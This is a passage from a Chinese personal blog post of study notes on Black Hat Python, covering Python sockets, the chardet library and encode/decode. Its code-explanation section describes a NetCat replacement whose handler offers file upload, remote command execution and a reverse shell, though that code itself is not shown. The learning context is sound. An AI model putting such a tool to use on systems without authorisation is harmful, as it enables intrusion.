<li>client_s.connect((ip, port))</li>
</ul>
</li>
<li>接收数据或者发送数据 <ol>
<li>client_s.recv(bufsize)    接收数据，数据以bytes类型返回，bufsize指定要接收的最大数据量。</li>
<li>client_s.send()    发送数据。返回值是要发送的字节数量。</li>
<li>client_s.sendall()    完整发送数据。将数据发送到连接的套接字，但在返回之前会尝试发送所有数据。成功返回None，失败则抛出异常。</li>
</ol>
</li>
<li>关闭连接  <ul>
<li>client_s.close()</li>
</ul>
</li>
</ol>
<h3 id="创建一个TCP-server端的流程"><a href="#创建一个TCP-server端的流程" class="headerlink" title="创建一个TCP server端的流程"></a>创建一个TCP server端的流程</h3><ol>
<li>创建套接字 server_s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)</li>
<li>把套接字绑定到本地IP与端口 server_s.bind((IP, port))</li>
<li>设置最大连接数量 server_s.listen(5) 设置你想设置的数字</li>
<li>等待连接 <ul>
<li>server_s.accept()    被动接受客户端连接,(阻塞式)等待连接的到来，并返回（conn,address）二元元组,其中conn是一个通信对象，可以用来接收和发送数据。address是连接客户端的地址。</li>
</ul>
</li>
<li>接收数据或者发送数据<ul>
<li>注意事项：<ul>
<li>Python3以后，socket传递的都是bytes类型的数据，字符串需要先转换一下，string.encode()即可；另一端接收到的bytes数据想转换成字符串，只要bytes.decode()一下就可以。</li>
<li>在正常通信时，accept()和recv()方法都是阻塞的。所谓的阻塞，指的是程序会暂停在那，一直等到有数据过来。</li>
</ul>
</li>
</ul>
</li>
<li>关闭连接 <ul>
<li>server_s.close()</li>
</ul>
</li>
</ol>
<h2 id="chardet库"><a href="#chardet库" class="headerlink" title="chardet库"></a>chardet库</h2><p><strong>网上冲浪找到廖雪峰老师的博客</strong><span class="exturl" data-url="aHR0cHM6Ly93d3cubGlhb3h1ZWZlbmcuY29tL3dpa2kvMTAxNjk1OTY2MzYwMjQwMC8xMTgzMjU1ODgwMTM0MTQ0">https://www.liaoxuefeng.com/wiki/1016959663602400/1183255880134144</span></p>
<blockquote>
<p>字符串编码一直是令人非常头疼的问题，尤其是我们在处理一些不规范的第三方网页的时候。虽然Python提供了Unicode表示的str和bytes两种数据类型，并且可以通过encode()和decode()方法转换，但是，在不知道编码的情况下，对bytes做decode()不好做。</p>
</blockquote>
<blockquote>
<p>对于未知编码的bytes，要把它转换成str，需要先“猜测”编码。猜测的方式是先收集各种编码的特征字符，根据特征字符判断，就能有很大概率“猜对”。</p>
</blockquote>
<blockquote>
<p>当然，我们肯定不能从头自己写这个检测编码的功能，这样做费时费力。chardet这个第三方库正好就派上了用场。用它来检测编码，简单易用。</p>
</blockquote>
<h3 id="使用chardet"><a href="#使用chardet" class="headerlink" title="使用chardet"></a>使用chardet</h3><blockquote>
<p>chardet的使用非常简单，主模块里面只有一个函数detect。detect有一个参数，要求是bytes类型。bytes类型可以通过读取网页内容、open函数的rb模式、带b前缀的字符串、encode函数等途径获得。</p>
</blockquote>
<p>当我们拿到一个bytes时，就可以对其检测编码。用chardet检测编码，只需要一行代码：</p>
<pre class="language-python" data-language="python"><code class="language-python"><span class="token operator">>></span><span class="token operator">></span> chardet<span class="token punctuation">.</span>detect<span class="token punctuation">(</span><span class="token string">b'Hello, world!'</span><span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span><span class="token string">'encoding'</span><span class="token punctuation">:</span> <span class="token string">'ascii'</span><span class="token punctuation">,</span> <span class="token string">'confidence'</span><span class="token punctuation">:</span> <span class="token number">1.0</span><span class="token punctuation">,</span> <span class="token string">'language'</span><span class="token punctuation">:</span> <span class="token string">''</span><span class="token punctuation">&#125;</span></code></pre>
<p>检测出的编码是ascii，注意到还有个confidence字段，表示检测的概率是1.0（即100%）。</p>
<p><strong>我们来试试检测GBK编码的中文：</strong></p>
<pre class="language-python" data-language="python"><code class="language-python"><span class="token operator">>></span><span class="token operator">></span> data <span class="token operator">=</span> <span class="token string">'离离原上草，一岁一枯荣'</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">'gbk'</span><span class="token punctuation">)</span>
<span class="token operator">>></span><span class="token operator">></span> chardet<span class="token punctuation">.</span>detect<span class="token punctuation">(</span>data<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span><span class="token string">'encoding'</span><span class="token punctuation">:</span> <span class="token string">'GB2312'</span><span class="token punctuation">,</span> <span class="token string">'confidence'</span><span class="token punctuation">:</span> <span class="token number">0.7407407407407407</span><span class="token punctuation">,</span> <span class="token string">'language'</span><span class="token punctuation">:</span> <span class="token string">'Chinese'</span><span class="token punctuation">&#125;</span></code></pre>
<p>检测的编码是GB2312，注意到GBK是GB2312的超集，两者是同一种编码，检测正确的概率是74%，language字段指出的语言是’Chinese’。</p>
<h3 id="decode与encode的区别"><a href="#decode与encode的区别" class="headerlink" title="decode与encode的区别"></a>decode与encode的区别</h3><p>这两个函数，一直感觉理解的有些模糊，今天深入研究一下<br>2020年12月3日14:32:14</p>
<pre class="language-none"><code class="language-none">encode：编码
decode：解码
python内部编码方式为unicode，decode将其他编码方式转换成unicode编码方式，encode将unicode转换成其他编码方式。
因此unicode相当于一个中转:
(1)decode-&gt;unicode-&gt;encode 
(2)encode-&gt;unicode-&gt;decode</code></pre>
<p>字符串在Python内部的表示是unicode编码，因此，在做编码转换时，通常需要以unicode作为中间编码，即先将其他编码的字符串解码（decode）成unicode，再从unicode编码（encode）成另一种编码。</p>
<p>decode的作用是将其他编码的字符串转换成unicode编码，如str1.decode(‘gb2312’)，表示将gb2312编码的字符串str1转换成unicode编码。<br>encode的作用是将unicode编码转换成其他编码的字符串，如str2.encode(‘gb2312’)，表示将unicode编码的字符串str2转换成gb2312编码。</p>
<h1 id="代码详解"><a href="#代码详解" class="headerlink" title="代码详解"></a>代码详解</h1><p>这里需要特别注意编码问题，这里引入了个第三方库chardet用于解决此类问题，在linux系统中默认编码为utf-8，在windows系统中默认编码为gbk。<br>usage():用于帮助理解程序的作用以及用法。<br>server_loop():服务端主循环，用于接受客户端连接，返还客户端套接字。<br>client_sender()：用于连接服务端，首先检测是否已经从标准输入中接收数据，如果一切正常，就将数据发送给远程的目标主机并接受回传数据，知道没有更多的数据发送回来，然后再等待用户的下一步输入，并继续发送和接受数据，直到用户结束程序。<br>run_command():提供与客户端交互的方法，通过连接将命令结果回传到客户端。<br>client_handler():提供上传文件，执行命令，反弹shell的功能。<br><del>鸽一段时间<br>2020年12月2日22:56:23<br>没搞完，有时间在搞，非常喜欢用代码去实现一些东西，哎我应该学开发的。。。<br>要一心搞web安全了。</del><br>下图是在linux与windows上进行程序测试<br>图一<img data-src="image001.png"><br>图二<img data-src="image002.png"><br>图三<img data-src="image003.png"><br>图四<img data-src="image004.png"></p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><blockquote>
<p>学习到了制作Unix和Linux风格这种的后面接选项的工具。通过设置全局变量来达到不同的功能，这种编程思想开拓了我的眼界。</p>
</blockquote>

      <div class="tags">
          <a href="/tags/python/" rel="tag"><i class="ic i-tag"></i> python</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2020-12-25 09:11:50" itemprop="dateModified" datetime="2020-12-25T09:11:50+08:00">2020-12-25</time>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> 赞赏</button>
  <p>请我喝[茶]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt="1asy 微信支付">
        <p>微信支付</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.png" alt="1asy 支付宝">
        <p>支付宝</p>
      </div>
      
      <div>
        <img data-src="/images/paypal.png" alt="1asy 贝宝">
        <p>贝宝</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>1asy <i class="ic i-at"><em>@</em></i>1asy
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="https://self-ferry.github.io/2020/12/01/BHP%E7%AC%AC%E4%BA%8C%E7%AB%A0(%E4%B8%80)%E2%80%94%E2%80%94%E5%8F%96%E4%BB%A3NetCat/" title="BHP第二章(一)——取代NetCat">https://self-ferry.github.io/2020/12/01/BHP第二章(一)——取代NetCat/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2020/12/01/url-http/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;tva1.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1gicli3sbvtj20zk0m8x6p.jpg" title="url-http">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> Internet</span>
  <h3>url-http</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2020/12/02/python%E8%BF%9B%E7%A8%8B%E7%BA%BF%E7%A8%8B/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;tva1.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1giciryrr3rj20zk0m8nhk.jpg" title="python进程线程">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> python</span>
  <h3>python进程线程</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%AD%A3%E6%96%87"><span class="toc-number">2.</span> <span class="toc-text">正文</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BB%A3%E7%A0%81"><span class="toc-number">3.</span> <span class="toc-text">代码</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E6%8F%90%E5%AD%A6%E4%B9%A0"><span class="toc-number">4.</span> <span class="toc-text">前提学习</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#getopt%E5%BA%93%E5%AD%A6%E4%B9%A0"><span class="toc-number">4.1.</span> <span class="toc-text">getopt库学习</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#socket%E5%BA%93"><span class="toc-number">4.2.</span> <span class="toc-text">socket库</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%9B%E5%BB%BA%E4%B8%80%E4%B8%AATCP-client%E7%AB%AF%E7%9A%84%E6%B5%81%E7%A8%8B"><span class="toc-number">4.2.1.</span> <span class="toc-text">创建一个TCP client端的流程</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%9B%E5%BB%BA%E4%B8%80%E4%B8%AATCP-server%E7%AB%AF%E7%9A%84%E6%B5%81%E7%A8%8B"><span class="toc-number">4.2.2.</span> <span class="toc-text">创建一个TCP server端的流程</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#chardet%E5%BA%93"><span class="toc-number">4.3.</span> <span class="toc-text">chardet库</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8chardet"><span class="toc-number">4.3.1.</span> <span class="toc-text">使用chardet</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#decode%E4%B8%8Eencode%E7%9A%84%E5%8C%BA%E5%88%AB"><span class="toc-number">4.3.2.</span> <span class="toc-text">decode与encode的区别</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BB%A3%E7%A0%81%E8%AF%A6%E8%A7%A3"><span class="toc-number">5.</span> <span class="toc-text">代码详解</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">6.</span> <span class="toc-text">总结</span></a></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
        <ul>
          <li class="active"><a href="/2020/12/01/BHP%E7%AC%AC%E4%BA%8C%E7%AB%A0(%E4%B8%80)%E2%80%94%E2%80%94%E5%8F%96%E4%BB%A3NetCat/" rel="bookmark" title="BHP第二章(一)——取代NetCat">BHP第二章(一)——取代NetCat</a></li><li><a href="/2020/12/25/BHP%E7%AC%AC%E4%BA%8C%E7%AB%A0-%E4%BA%8C-%E2%80%94%E2%80%94%E5%88%9B%E5%BB%BATCP%E4%BB%A3%E7%90%86/" rel="bookmark" title="BHP第二章(二)——创建TCP代理">BHP第二章(二)——创建TCP代理</a></li>
        </ul>
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="1asy"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">1asy</p>
  <div class="description" itemprop="description"></div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">37</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">13</span>
        <span class="name">分类</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">40</span>
        <span class="name">标签</span>
      </a>
    </div>
</nav>

<div class="social">
      <span class="exturl item github" data-url="aHR0cHM6Ly9naXRodWIuY29tL3lvdXJuYW1l" title="https:&#x2F;&#x2F;github.com&#x2F;yourname"><i class="ic i-github"></i></span>
      <span class="exturl item twitter" data-url="aHR0cHM6Ly90d2l0dGVyLmNvbS95b3VybmFtZQ==" title="https:&#x2F;&#x2F;twitter.com&#x2F;yourname"><i class="ic i-twitter"></i></span>
      <span class="exturl item zhihu" data-url="aHR0cHM6Ly93d3cuemhpaHUuY29tL3Blb3BsZS95b3VybmFtZQ==" title="https:&#x2F;&#x2F;www.zhihu.com&#x2F;people&#x2F;yourname"><i class="ic i-zhihu"></i></span>
      <span class="exturl item music" data-url="aHR0cHM6Ly9tdXNpYy4xNjMuY29tLyMvdXNlci9ob21lP2lkPXlvdXJpZA==" title="https:&#x2F;&#x2F;music.163.com&#x2F;#&#x2F;user&#x2F;home?id&#x3D;yourid"><i class="ic i-cloud-music"></i></span>
      <span class="exturl item weibo" data-url="aHR0cHM6Ly93ZWliby5jb20veW91cm5hbWU=" title="https:&#x2F;&#x2F;weibo.com&#x2F;yourname"><i class="ic i-weibo"></i></span>
      <span class="exturl item about" data-url="aHR0cHM6Ly9hYm91dC5tZS95b3VybmFtZQ==" title="https:&#x2F;&#x2F;about.me&#x2F;yourname"><i class="ic i-address-card"></i></span>
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>


</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2020/12/01/url-http/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2020/12/02/python%E8%BF%9B%E7%A8%8B%E7%BA%BF%E7%A8%8B/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/python/" title="分类于 python">python</a>
</div>

    <span><a href="/2021/01/12/Python-converts-pictures-into-character-drawings/" title="Python converts pictures into character drawings">Python converts pictures into character drawings</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/mysql/" title="分类于 mysql">mysql</a>
</div>

    <span><a href="/2020/12/04/get%E4%B8%80%E4%B8%AAmysql%E7%9F%A5%E8%AF%86/" title="get一个mysql知识">get一个mysql知识</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/web/" title="分类于 web">web</a>
</div>

    <span><a href="/2020/12/09/%E5%88%9D%E5%AD%A6XSS/" title="初学XSS">初学XSS</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" title="分类于 网络安全">网络安全</a>
</div>

    <span><a href="/2021/01/18/AD-Attack-Defense/" title="Active Directory Kill Chain Attack &amp; Defense【转】">Active Directory Kill Chain Attack & Defense【转】</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/RE-Reverse-Engine/" title="分类于 RE(Reverse Engine)">RE(Reverse Engine)</a>
</div>

    <span><a href="/2020/11/26/windowsPE/" title="windowsPE">windowsPE</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/web/" title="分类于 web">web</a>
</div>

    <span><a href="/2020/12/09/%E6%90%AD%E5%BB%BAXSS%E5%B9%B3%E5%8F%B0/" title="搭建XSS平台">搭建XSS平台</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/web/" title="分类于 web">web</a>
</div>

    <span><a href="/2020/12/28/Learning-from-xpath/" title="Learning from xpath">Learning from xpath</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2020/12/31/Linux-Reviewing/" title="Linux-Reviewing">Linux-Reviewing</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" title="分类于 网络安全">网络安全</a>
</div>

    <span><a href="/2021/01/18/Awesome-Red-Teaming/" title="Awesome Red Teaming【转】">Awesome Red Teaming【转】</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Internet/" title="分类于 Internet">Internet</a>
</div>

    <span><a href="/2020/12/01/url-http/" title="url-http">url-http</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2021</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">1asy @ Yume Shoka</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2020/12/01/BHP第二章(一)——取代NetCat/',
    favicon: {
      show: "（●´3｀●）やれやれだぜ",
      hide: "(´Д｀)大変だ！"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"scale":1,"hHeadPos":0.5,"vHeadPos":0.618,"jsonPath":"/live2dw/assets/koharu.model.json"},"display":{"superSample":2,"width":150,"height":300,"position":"right","hOffset":0,"vOffset":-20},"mobile":{"show":true,"scale":0.5},"react":{"opacityDefault":0.7,"opacityOnHover":0.8},"log":false});</script></body>
</html>
